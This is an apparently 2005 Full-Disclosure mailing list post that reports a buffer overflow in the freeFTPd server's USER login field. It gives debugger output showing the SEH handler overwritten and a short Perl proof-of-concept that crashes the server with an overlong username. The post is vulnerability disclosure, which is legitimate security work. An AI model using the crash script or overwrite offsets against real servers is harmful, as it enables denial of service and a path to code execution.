Hi,
While drooling over my new Adriana Lima wallpaper, my tongue accidentally hit my keyboard and more than 1012 chars were sent to the login screen of my freeftpd server (which i use to backup my Adriana Lima pics). Guess what...the server crashed! Luckily I attach ollydbg to every process I have running and ths is what I found:
ECX 50505050
EIP 77C460CB msvcrt.77C460CB
Log data, item 0
Address=77C460CB
Message=Access violation when reading [50505050]
Log data, item 0
Address=77C460CB
Message=Access violation when reading [50505050]
77C460CB 8B01 MOV EAX,DWORD PTR DS:[ECX]
well, eip doesnt get overwritten, but SEH does:
0012B6CC 41414141
0012B6D0 42424242
0012B6D4 42424242
0012B6D8 43434343 Pointer to next SEH record
0012B6DC 47464544 SE handler
EIP 47464544
Log data, item 0
Address=47464544
Message=Access violation when executing [47464544]
I leave the exploit coding as an exercise...
enjoy
sample crash code:
#!/usr/bin/perl -w
#freeftpd USER buffer overflow
#barabas - 2005
use strict;
use Net::FTP;
my $user="\x41"x1011;
$user .="\x44\x45\x46\x47";#overwrite SEH
$user .="\x50"x400;
my $ftp = Net::FTP->new("127.0.0.1", Debug => 1);
$ftp->login("$user","whatevah");
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
